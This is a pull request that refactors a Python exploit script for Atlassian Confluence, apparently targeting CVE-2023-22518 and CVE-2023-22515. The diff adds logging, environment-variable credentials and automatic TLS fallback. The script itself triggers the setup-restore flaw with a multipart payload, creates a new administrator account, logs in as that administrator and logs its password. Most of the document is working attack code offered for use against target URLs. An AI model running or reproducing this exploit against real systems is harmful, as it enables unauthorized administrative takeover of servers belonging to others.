### PR TITLE
Update CVE-2023-22518.py

### DIFF
--- a/CVE-2023-22518.py
+++ b/CVE-2023-22518.py
@@ -1,10 +1,12 @@
-#! /usr/bin/env python3
+#!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 # Author: David Espejo (Fortytwo Security)
 
+import os
 import json
 import argparse
 import requests
+import logging
 from rich import print
 from alive_progress import alive_bar
 
@@ -15,25 +17,46 @@ HEADERS = {
 
 requests.packages.urllib3.disable_warnings()
 
+logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
+logger = logging.getLogger(__name__)
+
 class Confluence:
-    def __init__(self, base_url, verbose=False, output_file=None):
+    def __init__(self, base_url, verbose=False, output_file=None, username=None, password=None, timeout=3):
         self.base_url = base_url
         self.verbose = verbose
-        self.username = "pleasepatch"
-        self.password = "Password2"
+        self.username = username or os.getenv("CONFLUENCE_USERNAME")
+        self.password = password or os.getenv("CONFLUENCE_PASSWORD")
         self.output_file = output_file
+        self.timeout = timeout
+        self.verify_ssl = self.auto_detect_tls()
+
+        if not self.username or not self.password:
+            logger.error("Username or password not provided.")
+            raise ValueError("Username or password not provided.")
+
+    def auto_detect_tls(self):
+        try:
+            response = requests.get(self.base_url, timeout=self.timeout)
+            response.raise_for_status()
+            logger.info("SSL verification successful.")
+            return True
+        except requests.exceptions.SSLError:
+            logger.warning("SSL verification failed. Disabling SSL verification.")
+            return False
+        except requests.exceptions.RequestException as e:
+            logger.error(f"Connection error during TLS check: {str(e)}")
+            return False
 
     def send_request(self, method, url, auth=None, data=None):
         try:
-            response = requests.request(method, url, headers=HEADERS, verify=False, timeout=3, auth=auth, data=data)
+            response = requests.request(method, url, headers=HEADERS, verify=self.verify_ssl, timeout=self.timeout, auth=auth, data=data)
+            response.raise_for_status()
             return response.status_code, response.text
         except requests.exceptions.RequestException as e:
-            if self.verbose:
-                print(f"[[bold red]ERROR[/bold red]] Request error for {url}: {str(e)}")
+            logger.error(f"Request error for {url}: {str(e)}")
             return None, None
 
     def check_authentication(self):
-        """Check authentication and retrieve user details."""
         auth = (self.username, self.password)
         url = f"{self.base_url}/rest/api/user?username={self.username}"
         status, response = self.send_request("GET", url, auth=auth)
@@ -43,35 +66,35 @@ class Confluence:
                 user_info = json.loads(response.strip())
                 formatted_user_info = json.dumps(user_info, indent=2)
                 if self.verbose:
-                    print(f"[INFO] Username: {self.username}")
-                    print(f"[INFO] Password: {self.password}")
-            except json.JSONDecodeError:
+                    logger.info(f"Username: {self.username}")
+                    logger.info(f"Password: {self.password}")
+            except (json.JSONDecodeError, ValueError) as e:
+                logger.error(f"Failed to parse user info: {str(e)}")
                 return False
-            
             return True
         else:
-            if self.verbose:
-                print(f"[-] Authentication failed on REST API")
-            
+            logger.error("Authentication failed on REST API")
             return False
 
     def exploit(self):
         success_message = None
+        error_message = None
 
         if not self.trigger_vulnerability():
-            error_message = f"[-] Failed to trigger vulnerability for {self.base_url}"
+            error_message = f"Failed to trigger vulnerability for {self.base_url}"
         elif not self.create_admin_account():
-            error_message = f"[-] Failed to create a new administrator for {self.base_url}"
+            error_message = f"Failed to create a new administrator for {self.base_url}"
         elif self.check_authentication():
-            success_message = f"[+] Successfully exploited {self.base_url} and logged in as admin!"
+            success_message = f"Successfully exploited {self.base_url} and logged in as admin!"
         else:
-            error_message = f"[-] Failed to authenticate with created admin account at {self.base_url}"
+            error_message = f"Failed to authenticate with created admin account at {self.base_url}"
 
         if success_message:
-            if not self.verbose:
-                print(success_message)
+            if self.verbose:
+                logger.info(success_message)
             return success_message
         else:
+            logger.error(error_message)
             return error_message
 
     def trigger_vulnerability(self):
@@ -93,18 +116,14 @@ class Confluence:
         if status == 200:
             if "Setup Successful" in response:
                 if self.verbose:
-                    print("[+] Created new administrator successfully")
+                    logger.info("Created new administrator successfully")
                 self.save_to_output_file()
-
             elif "A user with this username already exists" in response:
                 if self.verbose:
-                    print("[!] Administrator with this username already exists")
+                    logger.info("Administrator with this username already exists")
                 self.save_to_output_file()
-
             else:
-                if self.verbose:
-                    print(f"[-] Failed to create a new administrator for {self.base_url}")
-
+                logger.error(f"Failed to create a new administrator for {self.base_url}")
         return status == 200
 
     def save_to_output_file(self):
@@ -124,7 +143,7 @@ Content-Disposition: form-data; name="buildIndex"
 
 false
 ------WebKitFormBoundaryT3yekvo0rGaL9QR7
-Content-Disposition: form-data; name="file";filename="test-restore.zip"
+Content-Disposition: form-data; name="file"; filename="test-restore.zip"
 
 ZIP_DATA
 ------WebKitFormBoundaryT3yekvo0rGaL9QR7
@@ -133,13 +152,13 @@ Content-Disposition: form-data; name="edit"
 Upload and import
 ------WebKitFormBoundaryT3yekvo0rGaL9QR7--"""
 
-    response = requests.post(f'{url}/json/setup-restore.action?synchronous=true', headers=headers, data=data)
-    print(f"[blue]CVE-2023-22518 Check:[/blue]")
-    print(f"[green]Status Code: {response.status_code}[/green]")
+    response = requests.post(f'{url}/json/setup-restore.action?synchronous=true', headers=headers, data=data, verify=False)
+    logger.info(f"CVE-2023-22518 Check:")
+    logger.info(f"Status Code: {response.status_code}")
     if response.status_code == 405:
-        print(f"[red]{url} might be vulnerable to CVE-2023-22518[/red]")
+        logger.warning(f"{url} might be vulnerable to CVE-2023-22518")
     else:
-        print(f"[green]{url} is not vulnerable to CVE-2023-22518[/green]")
+        logger.info(f"{url} is not vulnerable to CVE-2023-22518")
 
     return response.status_code
 
@@ -147,16 +166,16 @@ def exploit_target(url, verbose=False, output_file=None):
     return Confluence(url, verbose=verbose, output_file=output_file).exploit()
 
 def summarize_findings(url, cve_2023_22518_status_code, exploitation_result):
-    print(f"[blue]Summary for {url}:[/blue]")
+    logger.info(f"Summary for {url}:")
     if cve_2023_22518_status_code == 405:
-        print(f"[red]{url} might be vulnerable to CVE-2023-22518[/red]")
+        logger.warning(f"{url} might be vulnerable to CVE-2023-22518")
     else:
-        print(f"[green]{url} is not vulnerable to CVE-2023-22518[/green]")
+        logger.info(f"{url} is not vulnerable to CVE-2023-22518")
 
     if "Successfully exploited" in exploitation_result:
-        print(f"[red]{url} is vulnerable to CVE-2023-22515[/red]")
+        logger.warning(f"{url} is vulnerable to CVE-2023-22515")
     else:
-        print(f"[green]{url} is not vulnerable to CVE-2023-22515[/green]")
+        logger.info(f"{url} is not vulnerable to CVE-2023-22515")
 
 if __name__ == "__main__":
     parser = argparse.ArgumentParser(description='Check for CVE-2023-22518 and exploit CVE-2023-22515 vulnerabilities')
@@ -169,4 +188,4 @@ if __name__ == "__main__":
         exploitation_result = exploit_target(args.instance_url, verbose=True, output_file=args.output_file)
         summarize_findings(args.instance_url, cve_2023_22518_status_code, exploitation_result)
     else:
-        print("[bold red]Please provide a single instance URL.[/bold red]")
+        logger.error("Please provide a single instance URL.")


### PR DESCRIPTION
Implemented automated TLS verification with fallback to disable verification

- Introduced `auto_detect_tls` method in the `Confluence` class to automatically check if the server's SSL certificate can be verified.
  - This method attempts to make a simple GET request to the base URL with SSL verification enabled.
  - If the request is successful, SSL verification is enabled for all subsequent requests.
  - If an SSL error occurs, SSL verification is disabled, allowing the script to continue without SSL verification.
- Updated the `Confluence` class to initialize the `verify_ssl` attribute based on the result of the `auto_detect_tls` method.
- Modified the `send_request` method to use the `verify_ssl` attribute for determining whether to verify SSL certificates for each request.
- Ensured that the script can still function if the server's certificate cannot be verified, enhancing reliability while maintaining security.
- Improved logging to provide clear information on the status of SSL verification.
- Refactored the main execution flow to use the automated TLS check, ensuring a smooth and automatic handling of SSL verification.
- Removed the CLI argument `--verify-ssl` as SSL verification is now handled automatically.